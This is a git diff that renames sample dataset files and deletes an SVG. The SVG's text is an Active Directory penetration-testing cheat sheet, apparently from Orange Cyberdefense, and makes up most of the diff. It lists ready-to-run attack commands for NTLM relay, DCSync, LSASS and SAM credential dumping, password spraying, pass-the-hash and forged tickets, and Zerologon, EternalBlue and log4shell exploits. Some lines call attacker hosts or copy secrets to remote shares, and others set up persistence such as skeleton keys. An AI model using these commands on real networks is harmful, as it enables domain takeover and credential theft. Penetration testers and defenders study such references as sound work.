diff --git a/Documents/Sample_Datasets/Global poverty and inequality dataset_pip_codebook.csv b/EduDocuments/Sample_Datasets/Global poverty and inequality dataset_pip_codebook.csv
similarity index 100%
rename from Documents/Sample_Datasets/Global poverty and inequality dataset_pip_codebook.csv
rename to EduDocuments/Sample_Datasets/Global poverty and inequality dataset_pip_codebook.csv
diff --git a/Documents/Sample_Datasets/Global poverty and inequality dataset_pip_dataset.csv b/EduDocuments/Sample_Datasets/Global poverty and inequality dataset_pip_dataset.csv
similarity index 100%
rename from Documents/Sample_Datasets/Global poverty and inequality dataset_pip_dataset.csv
rename to EduDocuments/Sample_Datasets/Global poverty and inequality dataset_pip_dataset.csv
diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-1cce6b6e-6c6b-4ff2-8a76-174e0ac22f7e.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-1cce6b6e-6c6b-4ff2-8a76-174e0ac22f7e.csv
similarity index 100%
rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-1cce6b6e-6c6b-4ff2-8a76-174e0ac22f7e.csv
rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-1cce6b6e-6c6b-4ff2-8a76-174e0ac22f7e.csv
diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-626c6836-95f2-4f8f-9b7a-d7fb46844e98.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-626c6836-95f2-4f8f-9b7a-d7fb46844e98.csv
similarity index 100%
rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-626c6836-95f2-4f8f-9b7a-d7fb46844e98.csv
rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-626c6836-95f2-4f8f-9b7a-d7fb46844e98.csv
diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-82dc1cbe-49a7-4a2c-a57e-4f53db8a9b3c.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-82dc1cbe-49a7-4a2c-a57e-4f53db8a9b3c.csv
similarity index 100%
rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-82dc1cbe-49a7-4a2c-a57e-4f53db8a9b3c.csv
rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-82dc1cbe-49a7-4a2c-a57e-4f53db8a9b3c.csv
diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-8d88e7cd-4fe6-4667-9a0b-7fe114ab19de.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-8d88e7cd-4fe6-4667-9a0b-7fe114ab19de.csv
similarity index 100%
rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-8d88e7cd-4fe6-4667-9a0b-7fe114ab19de.csv
rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-8d88e7cd-4fe6-4667-9a0b-7fe114ab19de.csv
diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-8f02fa05-e1d5-4eb2-8656-b13671c34047.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-8f02fa05-e1d5-4eb2-8656-b13671c34047.csv
similarity index 100%
rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-8f02fa05-e1d5-4eb2-8656-b13671c34047.csv
rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-8f02fa05-e1d5-4eb2-8656-b13671c34047.csv
diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-b27072c5-0faa-43cc-8fbb-71af94f24b0d.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-b27072c5-0faa-43cc-8fbb-71af94f24b0d.csv
similarity index 100%
rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/export-b27072c5-0faa-43cc-8fbb-71af94f24b0d.csv
rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/export-b27072c5-0faa-43cc-8fbb-71af94f24b0d.csv
diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/massshootings20-20-2023.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/massshootings20-20-2023.csv
similarity index 100%
rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/massshootings20-20-2023.csv
rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/massshootings20-20-2023.csv
diff --git a/Documents/Sample_Datasets/Gun Violence Archive - Incidents/officer involved.csv b/EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/officer involved.csv
similarity index 100%
rename from Documents/Sample_Datasets/Gun Violence Archive - Incidents/officer involved.csv
rename to EduDocuments/Sample_Datasets/Gun Violence Archive - Incidents/officer involved.csv
diff --git a/Documents/Sample_Datasets/Screen Time Data.csv b/EduDocuments/Sample_Datasets/Screen Time Data.csv
similarity index 100%
rename from Documents/Sample_Datasets/Screen Time Data.csv
rename to EduDocuments/Sample_Datasets/Screen Time Data.csv
diff --git a/Documents/Sample_Datasets/Wellbeing_and_lifestyle_data_Kaggle.csv b/EduDocuments/Sample_Datasets/Wellbeing_and_lifestyle_data_Kaggle.csv
similarity index 100%
rename from Documents/Sample_Datasets/Wellbeing_and_lifestyle_data_Kaggle.csv
rename to EduDocuments/Sample_Datasets/Wellbeing_and_lifestyle_data_Kaggle.csv
diff --git a/Documents/Sample_Datasets/conservative_news_domains.txt b/EduDocuments/Sample_Datasets/conservative_news_domains.txt
similarity index 100%
rename from Documents/Sample_Datasets/conservative_news_domains.txt
rename to EduDocuments/Sample_Datasets/conservative_news_domains.txt
diff --git a/Documents/Sample_Datasets/forbes_richman_Annual_03-30-23.csv b/EduDocuments/Sample_Datasets/forbes_richman_Annual_03-30-23.csv
similarity index 100%
rename from Documents/Sample_Datasets/forbes_richman_Annual_03-30-23.csv
rename to EduDocuments/Sample_Datasets/forbes_richman_Annual_03-30-23.csv
diff --git a/Documents/Sample_Datasets/global-data-on-sustainable-energy (1).csv b/EduDocuments/Sample_Datasets/global-data-on-sustainable-energy (1).csv
similarity index 100%
rename from Documents/Sample_Datasets/global-data-on-sustainable-energy (1).csv
rename to EduDocuments/Sample_Datasets/global-data-on-sustainable-energy (1).csv
diff --git a/Documents/Sample_Datasets/preprocessed_world_data_2023.csv b/EduDocuments/Sample_Datasets/preprocessed_world_data_2023.csv
similarity index 100%
rename from Documents/Sample_Datasets/preprocessed_world_data_2023.csv
rename to EduDocuments/Sample_Datasets/preprocessed_world_data_2023.csv
diff --git a/Documents/Sample_Datasets/world-data-2023.csv b/EduDocuments/Sample_Datasets/world-data-2023.csv
similarity index 100%
rename from Documents/Sample_Datasets/world-data-2023.csv
rename to EduDocuments/Sample_Datasets/world-data-2023.csv
diff --git a/References/orange-cyberdefense_pentest_ad_dark_2023_02.svg b/References/orange-cyberdefense_pentest_ad_dark_2023_02.svg
deleted file mode 100644
index ab1e01f..0000000
--- a/References/orange-cyberdefense_pentest_ad_dark_2023_02.svg
+++ /dev/null
@@ -1,433 +0,0 @@ -]>‎no credentials‎Is enterprise admin ?‎Permissions move‎Domain admin‎got administrator access on one machine‎Lateral Move‎got username but no password‎classic quick compromission methods‎how to read‎MITM (Listen and relay)‎Listener‎NTLM Relay‎Arp poisoning‎Persistence‎Trust relationship / Forest to Forest‎Privilege escalation‎Known vulnerabilities‎Weak ADCS configuration‎Kerberos Delegation move‎valid credentials‎cracking hash‎Pentesting active ‎directory‎Scan Network‎cme smb <ip_range> # enumerate smb hosts‎nmap -sP -p <ip> # ping scan‎nmap -PN -sV --top-ports 50 --open <ip> # ‎quick scan‎nmap -PN --script smb-vuln* -p139,445 <ip> # ‎search smb vuln‎nmap -PN -sC -sV -oA <output> <ip> # classic ‎scan‎nmap -PN -sC -sV -p- -oA <output> <ip> # full ‎scan‎nmap -sU -sC -sV -oA <output> <ip> # udp scan‎find vulnerable host‎Find DC IP‎nmcli dev show eth0 # show domain name & dns‎nslookup -type=SRV _ldap._tcp.dc._msdcs.<‎domain>‎zone transfer‎dig axfr <domain_name> @<name_server>‎List guest access on smb share‎enum4linux -a -u "" -p "" <dc-ip> && ‎enum4linux -a -u "guest" -p "" <dc-ip>‎smbmap -u "" -p "" -P 445 -H <dc-ip> && ‎smbmap -u "guest" -p "" -P 445 -H <dc-ip>‎smbclient -U '%' -L //<dc-ip> && smbclient -U '‎guest%' -L //<dc-ip>‎cme smb <ip> -u '' -p '' # enumerate null session‎cme smb <ip> -u 'a' -p '' # enumerate anonymous ‎access‎Enumerate ldap‎nmap -n -sV --script "ldap* and not brute" -p ‎389 <dc-ip>‎ldapsearch -x -h <ip> -s base ‎user found‎Find user list‎enum4linux -U <dc-ip> | grep 'user:'‎cme smb <ip> --users ‎net rpc group members 'Domain Users' -W '<‎domain>' -I '<ip>' -U '%'‎OSINT - enumerate username on internet‎nmap -p 88 --script=krb5-enum-users --script-‎args="krb5-enum-users.realm='<domain>',‎userdb=<users_list_file>" <ip> ‎user found‎poisoning‎🔥 LLMNR / NBTNS/ MDNS‎responder -I eth0 (use --lm to force lm ‎downgrade) # disable smb & http if relay‎IPV6 prefered to IPV4‎mitm6 -d <domain>‎ARP poisoning‎bettercap‎Poisoning SMB ->‎ 
HTTP ->‎coerce‎Unauthent PetitPotam (CVE-2022-26925)‎PetitPotam.py -d <domain> <listener_ip> <‎target_ip>‎coerce SMB ->‎Enterprise Admin‎GG good luck for the report !‎ACLs/ACEs‎permissions‎🔥 dcsync‎#Administrators, Domain Admins, or Enterprise ‎Admins as well as Domain Controller computer ‎accounts‎mimikatz lsadump::dcsync /domain:<target_‎domain> /user:<target_domain>\administrator‎secretsdump '<domain>'/'<user>':'<‎password>'@'<domain_controller>'‎can change‎msDS-KeyCredentialLInk‎(Generic Write) + ADCS‎Shadow Credentials‎(need ADCS)‎Whisker.exe‎certipy shadow auto '-u <user>@<domain>' -p <‎password> -account '<target_account>'‎pywhisker.py‎pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "‎CERTIFICATE_PASSWORD" --target "TARGET_‎SAMNAME" --action "list"‎Pass the Certificate‎On Group‎Self (Self-Membership) on Group‎GenericAll/WriteProperty on Group‎WriteProperty (Self-Membership)‎WriteOwner on Group‎WriteDACL + WriteOwner‎Give yourself Generic all‎owneredit.py ‎dacledit.py‎Add group member‎net group "<group>" <myuser> /add /domain‎ldeep ldap -u <user> -p <pwd> -d <domain> -s ‎ldap://<dc> add_to_group "CN=<user>,DC=<‎domain>" "CN=<group>,DC=<domain>"‎ACL‎On Computer‎GenericAll / GenericWrite‎msDs-AllowedToActOnBehalf‎add Key Credentials‎shadow credentials‎RBCD‎On User‎GenericAll / GenericWrite‎change password‎net user <user> <password> /domain‎add SPN (target Kerberoasting)‎targetedKerberoast.py -d <domain> -u <user> -‎p <pass>‎hash found (TGS)‎add Key Credentials‎logon script‎User with clear text pass‎Access‎shadow credentials‎ForceChangePassword‎net user <user> <password> /domain‎net rpc password <user> <password> -S <dc_‎fqdn>‎User with clear text pass‎aclpwn.py‎acltoolkit <domain>/<user>:'<password>@<‎target> get-objectacl [-all| -object <object>]‎get laps passwords‎who can read LAPS‎MATCH p=(g:Group)-[:ReadLAPSPassword]->(c:‎Computer) RETURN p‎Get-LAPSPasswords -DomainController <ip_‎dc> -Credential <domain>\<login> | Format-‎Table -AutoSize‎foreach ($objResult in 
$colResults){$‎objComputer = $objResult.Properties; $‎objComputer.name|where {$objcomputer.name -‎ne $env:computername}|%{foreach-object {Get-‎AdmPwdPassword -ComputerName $_}}}‎cme ldap <dc_ip> -d <domain> -u <user> -p <‎password> --module laps‎use post/windows/gather/credentials/enum_laps‎admin‎ GPO‎MATCH (gr:Group), (gp:GPO), p=((gr)-[:‎GenericWrite]->(gp)) RETURN p‎SID of principals that can create new GPOs in the ‎domain‎Get-DomainObjectAcl -SearchBase "CN=Policies,‎CN=System,DC=blah,DC=com" -‎ResolveGUIDs | ? {​​​​​​​ $_.ObjectAceType -eq "‎Group-Policy-Container" }​​​​​​​ | select ObjectDN, ‎ActiveDirectoryRights, SecurityIdentifier | fl‎return the principals that can write to the GP-Link ‎attribute on OUs‎Get-DomainOU | Get-DomainObjectAcl -‎ResolveGUIDs | ? {​​​​​​​​​​​​​ $_.ObjectAceType -eq "GP-‎Link" -and $_.ActiveDirectoryRights -match "‎WriteProperty" }​​​​​​​​​​​​​ | select ObjectDN, ‎SecurityIdentifier | fl‎Generic Write on GPO‎Abuse GPO‎Access‎DNSadmins abuse‎(CVE-2021-40469)‎dnscmd.exe /config /serverlevelplugindll <\\‎path\to\dll> # need a dnsadmin user‎sc \\DNSServer stop dns‎sc \\DNSServer start dns‎Admin‎Domain Admin‎Lateral move‎Crack Hash‎Kindly provided by Orange Cyberdefense ;-)‎Some commands can break stuff, be sure to ‎know what are you doing !‎Please find legend below.‎Domain admin‎🔥dump ntds.dit‎cme smb <dcip> -u <user> -p <password> -d <‎domain> --ntds‎secretsdump.py '<domain>/<user>:<pass>'@<ip>‎ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q‎secretsdump.py -ntds ntds_file.dit -system ‎SYSTEM_FILE -hashes lmhash:nthash LOCAL -‎outputfile ntlm-extract‎windows/gather/credentials/domain_hashdump‎certsync -u <user> -p <password> -d <domain> -‎dc-ip <dcip> -ns <nsip>‎Lateral move‎Crack Hash‎dpapi.py backupkeys -hashes ':<hash>' -t ‎Administrator@<dc_ip> --export ‎# note : dpapi.py != DonPAPI‎DonPAPI -pvk <domain_backupkey.pvk> - H ':<‎hash>' <domain>/<user>@<ip_range>‎Credentials‎Administrator access‎Extract credentials‎from 
LSASS‎LSASS as a Protected Process‎PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp‎mimikatz "!+" "!processprotect /process:lsass.‎exe /remove" "privilege::debug" "token::‎elevate" "sekurlsa::logonpasswords" "!‎processprotect /process:lsass.exe" "!-" #with ‎mimidriver.sys ‎procdump.exe -accepteula -ma lsass.exe lsass.‎dmp‎mimikatz "privilege::debug" "sekurlsa::minidump ‎lsass.dmp" "sekurlsa::logonPasswords" "exit"‎mimikatz "privilege::debug" "token::elevate" "‎sekurlsa::logonpasswords" "exit"‎load kiwi‎creds_all‎cme smb <ip_range> -u <user> -p <password> -‎M lsassy‎🔥lsassy -d <domain> -u <user> -p <‎password> <ip>‎User + Pass‎Hashes NTLM‎Lateral move (PTH/PTK)‎(clear text pass in some case)‎Extract credentials‎from SAM‎cme smb <ip_range> -u <user> -p '<password>' --‎sam ‎hashdump‎reg save HKLM\SAM <file>; reg save HKLM\‎SECURITY <file>; reg save HKLM\SYSTEM <file>‎secretsdump.py -system SYSTEM -sam SAM ‎LOCAL‎shadow copies‎diskshadow list shadows all‎mklink /d c:\shadowcopy \\?\GLOBALROOT\‎Device\HarddiskVolumeShadowCopy1\‎mimikatz "privilege::debug" "lsadump::sam" "‎exit"‎🔥secretsdump.py <domain>/<user>:<‎password>@<ip>‎reg.py <domain>/<user>:<password>@<ip> ‎backup -o '\\<smb_ip>\share'‎secretsdump.py -sam <sam_file> -system <‎system_file> LOCAL‎Hashes NTLM‎Lateral move PTH‎Extract credentials from LSA‎cme smb <ip_range> -u <user> -p '<password>' --‎lsa‎🔥secretsdump.py <domain>/<user>:<‎password>@<ip>‎reg.py <domain>/<user>:<password>@<ip> ‎backup -o '\\<smb_ip>\share'‎secretsdump.py -security <security_file> -‎system <system_file> LOCAL‎Cached domain logon‎Machine account‎Service account‎MsCache 2‎User + Pass‎dpapi extract‎🔥DonPAPI.py <domain>/<user>:<‎password>@<target>‎mimikatz.exe "sekurlsa::dpapi"‎secretsdump.py <domain>/<user>:<passwor>@<‎ip>‎search password files‎findstr /si 'password' *.txt *.xml *.docx‎search stored password ‎lazagne.exe all‎chrome‎%appdata%\Local\Google\Chrome\User Data\‎Default‎SharpChromium.exe‎token manipulation‎.\incognito.exe 
list_tokens -u‎.\incognito.exe execute -c "<domain>\<user>" ‎powershell.exe‎use incognito‎impersonate_token <domain>\\<user>‎cme smb <ip> -u <user> -p <password> -M ‎impersonate ‎irs.exe list‎irs.exe exec --pid <pid> --command <command>‎Extract credentials with certificate ‎authentication (ADCS required)‎masky - d <domain> -u <user> (-p <password> ||‎ -k || -H <hash>) -ca <certificate authority> <ip>‎NT hash‎Lateral move PTH‎ccache‎Lateral move Pass the ticket‎pfx‎Lateral move Pass the certificate‎ACL‎User + Pass‎Impersonate RDP Session‎psexec -s -i cmd‎query user‎cmd /k tscon <id> /dest:console‎Lateral move RDP‎Hydrid-Environement (Azure AD Connect)‎Dump cleartext password of MSOL Account on ‎AAD Connect server‎azuread_decrypt_msol_v2.ps1‎cme smb <ip> -u <user> -p <password> -M msol‎DCSync‎User + Pass‎Lateral move (Clear text pass)‎Lateral move‎WSUSpect‎WSUSpendu.ps1 # need compromised WSUS ‎server‎sccm admin‎abuse sccm‎CMPivot‎PowerSCCM‎SharpSCCM‎Administrator access‎MSSQL‎find mssql access‎cme mssql <ip> -u <user> -p <password> -d <‎domain>‎Users with SQLadmin‎MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) ‎RETURN p‎EXECUTE sp_configure 'show advanced options', ‎1; RECONFIGURE;‎EXECUTE sp_configure 'xp_cmdshell', 1; ‎RECONFIGURE;‎EXEC xp_cmdshell '<cmd>'‎Low Access‎trust link‎Get-SQLServerLinkCrawl -username <user> -‎password <pass> -Verbose -Instance <sql_‎instance> -Query "<query>"‎use exploit/windows/mssql/mssql_linkcrawler‎MSSQL‎mssqlclient.py -windows-auth <domain>/<‎user>:<password>@<ip> (pr #1397)‎enum_db‎enable_xp_cmdshell‎xp_cmdshell <cmd>‎Low Access‎enum_impersonate‎exec_as_user <user>‎exec_as_login <login>‎MSSQL‎xp_dir_tree <ip>‎trustlink‎sp_linkedservers‎use_link‎MSSQL‎coerce SMB ->‎Local User‎cme smb -u <user> -p <pass>' <ip> --local-auth‎impacket like cleartext pasword without domain/‎Administrator access‎Password‎Cleartext password‎interactive-shell‎psexec.py <domain>/<user>:<password>@<ip>‎psexec.exe -AcceptEULA \\<ip>‎mimikatz "privilege::debug 
sekurlsa::pth /user:<‎user> /domain:<domain> /ntlm:<hash>"‎Authority/sytem‎pseudo-shell (file write and read)‎atexec.py <domain>/<user>:<password>@<ip> "‎command"‎smbexec.py <domain>/<user>:<password>@<‎ip>‎wmiexec.py <domain>/<user>:<password>@<‎ip>‎dcomexec.py <domain>/<user>:<password>@<‎ip>‎crackmapexec smb <ip_range> -u <user> -p <‎password> -d <domain>‎crackmapexec smb <ip_range> -u <user> -p <‎password> -local-auth‎Authority/sytem‎WinRM‎evil-winrm -i <ip> -u <user> -p <password>‎RDP‎xfreerdp /u:<user> /d:<domain> /p:<password> /‎v:<ip>‎SMB‎smbclient.py <domain>/<user>:<password>@<‎ip>‎search files‎MSSQL‎crackmapexec mssql <ip_range> -u <user> -p <‎password>‎mssqlclient.py -windows-auth <domain>/<‎user>:<password>@<ip>‎MSSQL‎Administrator access‎Low access‎High access‎NTLM Hash‎🔥 Pass the hash (PTH)‎interactive-shell‎psexec.py -hashes ":<hash>" <user>@<ip>‎psexec.exe -AcceptEULA \\<ip>‎mimikatz "privilege::debug sekurlsa::pth /user:<‎user> /domain:<domain> /ntlm:<hash>"‎Authority/sytem‎pseudo-shell (file write and read)‎atexec.py -hashes ":<hash>" <user>@<ip> "‎command"‎smbexec.py -hashes ":<hash>" <user>@<ip>‎wmiexec.py -hashes ":<hash>" <user>@<ip>‎dcomexec.py -hashes ":<hash>" <user>@<ip>‎crackmapexec smb <ip_range> -u <user> -d <‎domain> -H ':<hash>'‎crackmapexec smb <ip_range> -u <user> -H ':<‎hash>' --local-auth‎Authority/sytem‎WinRM‎evil-winrm -i <ip> -u <user> -H <hash>‎RDP‎reg.py <domain>/<user>@<ip> -hashes ':<hash>' ‎add -keyName 'HKLM\System\‎CurrentControlSet\Control\Lsa' -v '‎DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0'‎xfreerdp /u:<user> /d:<domain> /pth:<hash> /‎v:<ip>‎SMB‎smbclient.py -hashes ":<hash>" <user>@<ip>‎search files‎MSSQL‎crackmapexec mssql <ip_range> -H ':<hash>'‎mssqlclient.py -windows-auth -hashes ":<‎hash>" <domain>/<user>@<ip> ‎MSSQL‎Administrator access‎Low access‎High access‎overpass the hash / pass the key (PTK)‎Rubeus asktgt /user:victim /rc4:<rc4value>‎Rubeus ptt /ticket:<ticket>‎Rubeus createnetonly 
/program:C:\Windows\‎System32\[cmd.exe||upnpcont.exe]‎Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>‎getTGT.py <domain>/<user> -hashes :<hashes>‎getTGT.py -aesKey '<key>' <domain>/<user>@<‎ip>‎Pass the ticket‎Kerberos‎Pass the ticket‎(ccache / kirbi)‎Convert format‎ticketConverter.py <kirbi||ccache> <ccache||‎kirbi>‎export KRB5CCNAME=/root/impacket-‎examples/domain_ticket.ccache‎impacket tools: Same as Pass the hash but use : -‎k and -no-pass for impacket‎mimikatz kerberos::ptc "<ticket>"‎Rubeus.exe ptt /ticket:<ticket>‎proxychains secretsdump -k'<domain>'/'<‎user>'@'<ip>'‎modify SPN‎tgssub.py -in <ticket.ccache> -out <newticket.‎ccache> -altservice "<service>/<target>" #pr ‎1256‎Pass the Ticket‎Administrator access‎see dcsync‎aesKey‎impacket tools: Same as Pass the hash but use : -‎aesKey for impacket (and use FQDN)‎proxychains secretsdump -aesKey <key> '<‎domain>'/'<user>'@'<ip>'‎see dcsync‎Administrator access‎Socks (with NTLM relay)‎proxychains lookupsid.py <domain>/<user>@<‎ip> -no-pass -domain-sids‎proxychains mssqlclient.py -windows-auth <‎domain>/<user>@<ip> -no-pass‎proxychains secretsdump -no-pass '<domain>'/'<‎user>'@'<ip>'‎pseudo-shell (file write and read)‎proxychains atexec.py -no-pass <domain>/<‎user>@<ip> "command"‎proxychains smbexec.py -no-pass <domain>/<‎user>@<ip>‎Authority/sytem‎proxychains smbclient.py -no-pass <user>@<ip>‎search files‎Users‎MSSQL‎see dcsync‎Administrator access‎Certificate (pfx)‎get hash NTLM from certificate‎certipy auth -pfx <crt_file> -dc-ip <dc_ip>‎NTLM hash‎Pass the Certificate‎pkinit‎ gettgtpkinit.py -cert-pfx "<pfx_file>" ^[-pfx-‎pass "<cert-password>"] "<fqdn_domain>/<‎user>" "<tgt_ccache_file>"‎Rubeus.exe asktgt /user:"<username>" /‎certificate:"<pfx_file>" [/password:"<certificate_‎password>"] /domain:"<fqdn-domain>" /dc:"<‎dc>" /show‎certipy auth -pfx <crt_file> -dc-ip <dc_ip>‎Schannel‎certipy auth -pfx <crt_file> -ldap-shell‎add_computer‎set_rbcd‎RBCD‎Pass the ticket‎Got valid username‎🔥Password spray‎Get password 
policy (need creds, but you should ‎get the policy before starting a spray)‎cme <IP> -u 'user' -p 'password' --pass-pol‎enum4linx -u 'username' -p 'password' -P <IP>‎Get-ADDefaultDomainPasswordPolicy‎FGPP‎ Get-ADFineGrainedPasswordPolicy -filter *‎Get-ADUserResultantPasswordPolicy -Identity <‎user>‎ldapsearch-ad.py --server '<dc>' -d <domain> -‎u <user> -p <pass> --type pass-pols‎cme smb <dc-ip> -u user.txt -p password.txt --‎no-bruteforce # test user=password‎cme smb <dc-ip> -u user.txt -p password.txt # ‎multiple test (carrefull of lock policy)‎sprayhound -U <users.txt> -d <domain> -dc <‎dcip>‎Clear text credentials found‎ASREPRoast‎Get ASREPRoastable users (need creds)‎Get-DomainUser -PreauthNotRequired -‎Properties SamAccountName‎MATCH (u:User {dontreqpreauth:true}), (c:‎Computer), p=shortestPath((u)-[*1..]->(c)) ‎RETURN p‎Get hash‎python GetNPUsers.py <domain>/ -usersfile <‎usernames.txt> -format hashcat -outputfile <‎hashes.domain.txt>‎Rubeus.exe asreproast /format:hashcat‎Blind Kerberoasting‎Rubeus.exe keberoast /domain:<domain> /dc:<‎dcip> /nopreauth: <asrep_user> /spns:<users.‎txt>‎GetUserSPNs.py -no-preauth "<asrep_user>" -‎usersfile "<user_list.txt>" -dc-host "<dc_ip>" "<‎domain>"/‎Hash found (TGS)‎CVE-2022-33679‎python3 CVE-2022-33679.py <domain>/<‎user> <target>‎Hash found (ASREP)‎Lateral move (PTT)‎Low hanging fruit‎zerologon (unsafe)‎(CVE-2020-1472)‎zerologon-scan '<dc_netbios_name>' '<ip>'‎python3 cve-2020-1472-exploit.py <MACHINE_‎BIOS_NAME> <ip>‎secretsdump.py <DOMAIN>/<MACHINE_BIOS_‎NAME>\$@<IP> -no-pass -just-dc-user "‎Administrator" ‎secretsdump.py -hashes :<HASH_admin> <‎DOMAIN>/Administrator@<IP>‎python3 restorepassword.py -target-ip <IP> <‎DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_‎BIOS_NAME> -hexpass <HEXPASS>‎Eternal Blue‎MS17-010‎exploit/windows/smb/ms17_010_eternalblue‎SYSVOL & GPP‎MS14-025‎use scanner/smb/smb_enum_gpp‎findstr /S /I cpassword \\<FQDN>\sysvol\<‎FQDN>\policies\*.xml‎tomcat/jboss 
manager‎auxiliary/scanner/http/tomcat_enum‎exploit/multi/http/tomcat_mgr_deploy‎java rmi‎exploit/multi/misc/java_rmi_server‎java serialized port‎ysoserial‎vulnerable product with cve‎searchsploit‎proxylogon‎proxyshell‎log4shell‎${jndi:ldap://<ip>:<port>/o=reference}‎rogueJndi-1.0.jar‎database credentials‎use admin/mssql/mssql_enum_sql_logins‎...‎Admin‎Domain Admin‎MSSQL connection‎Admin‎Domain Admin‎Low Access‎Credits‎mayfly (@M4yFly) ‎viking (@Vikingfr)‎Sant0rryu (@Sant0rryu)‎Jenaye (@jenaye_fr)‎Daahtk (@Daahtk)‎Entry point‎Highlight Technique 1‎technique/status/explanation‎Enumeration infos‎linux command‎windows command‎result / go to‎Technique 2 (CVE)‎technique/status/explanation‎windows command‎linux command‎or‎Result / go to 1‎Result / go to 2‎Technique3‎technique/status/explanation‎technique/status/explanation‎assemble‎windows command‎linux command‎go to‎Legend‎Bloodhound‎PowerView ‎Impacket‎crackmapexec‎certipy‎Metsaploit‎Windows tool‎Command‎dangerous (could break stuff)‎🔥 very common and efficient technic (quick ‎win)‎CVE (probably patched)‎inspired by / Sources‎https://www.thehacker.recipes/ (@_nwodtuhs)‎https://www.ired.team/ (@spotheplanet)‎https://ppn.snovvcrash.rocks/ (@snovvcrash)‎https://book.hacktricks.xyz/ (@carlospolopm)‎https://github.com/swisskyrepo/‎PayloadsAllTheThings/ (@pentest_swissky)‎https://blog.harmj0y.net/ (@harmj0y)‎https://hausec.com/domain-penetration-‎testing/ (@haus3c)‎https://dirkjanm.io/ (@_dirkjan)‎https://casvancooten.com/ (@chvancooten)‎https://zer1t0.gitlab.io/posts/attacking_ad/‎https://beta.hackndo.com (@HackAndDo)‎and a lot more ...‎(MITM)‎Listen and Relay‎Listen‎🔥 responder -I eth0 (use --lm to force lm ‎downgrade)‎smbclient.py‎NetNtlmv1‎NetNtlmv2‎User‎NTLM relay‎relay on itself‎MS08-068‎use exploit/windows/smb/smb_relay #‎windows200 / windows server2008‎Admin‎SMB -> LDAP(S)‎NetNTLMv1‎remove mic‎NetNTLMv2‎remove mic (CVE-2019-1040)‎relay to LDAP‎ntlmrelayx.py --remove-mic --escalate-user <‎user> -t ldap://<dc_fqdn> 
-smb2support‎ntlmrelayx.py -t ldaps://<dc> --remove-mic --‎add-computer <computer_name> <computer_‎password> --delegate-access -smb2support‎ntlmrelayx -t ldap://<dc> --shadow-‎credentials --shadow-target '<dc>'‎ntlmrelayx.py -wh <attacker_ip> -t ldap://<‎target> -l /tmp -6 -debug‎RBCD‎DcSync‎shadow credentials‎Users‎HTTP(S) -> LDAP‎-> SMB‎SMB unsigned‎Find SMB not signed (default on non DC)‎nmap -Pn -sS -T4 --open --script smb-security-‎mode -p445 ADDRESS/MASK‎use exploit/windows/smb/smb_relay‎cme smb $hosts --gen-relay-list relay.txt‎ntlmrelayx.py -tf targets.txt -smb2support (-‎6) --enum-domain‎🔥ntlmrelayx.py -tf targets.txt -‎smb2support -socks (-6)‎lateral move (socks)‎Users‎-> HTTP‎http ADCS web‎sccm ntlm relay attack‎ESC8‎-> MSSQL‎relay to mssql‎ntlmrelayx.py -t mssql://<ip> -smb2support ‎–socks‎lateral move (socks)‎SMB -> Netlogon‎Zero-Logon (safe method)‎(CVE-2020-1472)‎coerce come from dc01, relay to dc02‎ntlmrelayx.py -t dcsync://<dc_02_ip> -‎smb2support -auth-smb <user>:<password>‎DcSync‎wsus relay‎pywsus.py‎Persistence‎net group "domain admins" myuser /add /domain‎Golden ticket‎ticketer.py -aesKey <aeskey> -domain-sid <‎domain_sid> -domain <domain> <anyuser> ‎mimikatz "kerberos::golden /user:<admin_user> /‎domain:<domain> /sid:<domain-sid>/aes256:<‎krbtgt_aes256> /ptt"‎Silver Ticket‎mimikatz "kerberos::golden /sid:<current_user_‎sid> /domain:<domain-sid> /target:<target_‎server> /service:<target_service> /aes256:<‎computer_aes256_key> /user:<any_user> /ptt"‎ticketer.py -nthash <machine_nt_hash> -domain-‎sid <domain_sid> -domain <domain> <anyuser>‎Diamond ticket‎Saphire Ticket‎Directory Service Restore Mode (DSRM)‎PowerShell New-ItemProperty “HKLM:\System\‎CurrentControlSet\Control\Lsa\” -Name ‎“DsrmAdminLogonBehavior” -Value 2 -‎PropertyType DWORD‎Skeleton Key‎mimikatz "privilege::debug" "misc::skeleton" "‎exit"‎password is mimikatz‎Custom SSP‎mimikatz "privilege::debug" "misc::memssp" "‎exit"‎C:\Windows\System32\kiwissp.log‎Golden certificate‎certipy 
